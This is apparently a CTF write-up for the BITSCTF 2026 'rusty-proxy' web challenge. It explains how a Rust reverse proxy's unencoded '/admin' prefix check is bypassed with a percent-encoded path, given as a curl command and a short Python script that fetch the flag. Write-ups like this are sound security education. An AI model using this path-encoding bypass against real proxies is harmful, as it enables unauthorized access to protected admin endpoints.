76 words
1 minute
BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup
2026-02-22
Writeup
CTF
/
Security
/
Web Exploitation

Category: Web Exploitation

Flag: BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

Challenge Description#

Rust reverse proxy with Flask backend. Remote: http://rusty-proxy.chals.bitskrieg.in:25001

Analysis#

Proxy ACL in main.rs:

fn is_path_allowed(path: &str) -> bool {
    let normalized = path.to_lowercase();
    if normalized.starts_with("/admin") {
        return false;
    }
    true
}

The proxy checks the raw request path without URL decoding. Flask decodes %61a.

Exploitation#

Terminal window
curl "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"

/%61dmin/flag passes proxy check (doesn’t start with /admin), but Flask receives /admin/flag.

Or using Python:

# !/usr/bin/env python3
import requests


URL = "http://rusty-proxy.chals.bitskrieg.in:25001/%61dmin/flag"


r = requests.get(URL, timeout=10)
data = r.json()
print(f"Flag: {data.get('flag')}")
BITSCTF 2026 - rusty-proxy - Web Exploitation Writeup
https://fuwari.vercel.app/posts/49/bitsctf-2026-rusty-proxy-web-exploitation-writeup/
Author
Light
Published at
2026-02-22
License
CC BY-NC-SA 4.0
BITSCTF 2026 - safe not safe - Reverse Engineering Writeup
BITSCTF 2026 - Marlboro - Forensics Writeup
© 2026 Light. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Fuwari